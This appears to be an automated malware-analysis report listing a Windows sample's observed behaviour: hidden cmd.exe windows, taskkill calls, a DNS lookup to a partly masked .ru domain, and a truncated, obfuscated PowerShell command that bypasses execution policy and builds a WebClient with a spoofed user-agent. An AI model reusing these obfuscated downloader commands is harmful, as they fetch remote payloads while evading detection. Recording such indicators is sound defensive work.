Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /f /im cmd.exe
- %WINDIR%\syswow64\cmd.exe
- DNS ASK sc###ducts7.ru
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im cmd.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c iwbDyExnfhFHuWV & Po^wEr^sh^ell.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im cmd.exe
- '%WINDIR%\syswow64\cmd.exe' /c exit
- '%WINDIR%\syswow64\cmd.exe' /c iwbDyExnfhFHuWV & Po^wEr^sh^ell.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....